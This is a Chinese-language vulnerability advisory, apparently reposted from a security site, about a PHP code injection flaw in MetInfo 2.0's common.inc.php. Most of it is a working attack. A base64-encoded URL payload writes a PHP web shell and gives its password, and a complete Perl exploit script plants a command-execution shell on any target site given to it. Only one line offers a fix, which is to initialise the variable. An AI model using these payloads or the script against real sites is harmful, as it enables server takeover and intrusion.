影响版本: MetInfo 2.0
漏洞 描述: MetInfo企业网站管理系统是一个功能完善的营销型企业网站管理平台, PHP +MYSQL架构
MetInfo 2.0的/include/common.inc.php文件第132行: eval(base64_decode($class2_all_1[0])); $class2_all_1[0]变量未初始化,因此我们可以控制其值,进行代码注入的利用。
<*参考 www.linux520.com *>
测试
http://victim.com/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/
cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
base64编码部分为:fputs(fopen(templates/test.php,w+),<?php eval($_POST[c]);?>);
一句话后门地址: http://victim.com/templates/test.php 密码 c
==== #!/usr/bin/env perl use L WP ::UserAgent; print "################################################################ "; print "# MetInfo 2.0 c0de inj3cti0n 3xplo!t # "; print "# by:linux520.com # "; print "################################################################ "; die "Usage: $0 <target site> Ex:$0 victim.com " unless($ARGV[0]); my $victim = $ARGV[0]; $user_agent = new LWP::UserAgent; $vul_request = new HTTP::Request(GET," http://$victim/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/
cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs="); # fputs(fopen(templates/test.php,w+),<?php passthru($_GET[cmd]);?>); $user_agent->request($vul_request); $response = $user_agent->request(new HTTP::Request(GET," http://$victim/templates/test.php ")); if($response->is_success) { print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id "; } else { print "could not connect to $victim"; } #############################################
临时解决方案: 对$class2_all_1[0]变量进行初始化
查看更多关于MetInfo 2.0 PHP代码注入漏洞及修复 - 网站安全 - 自的详细内容...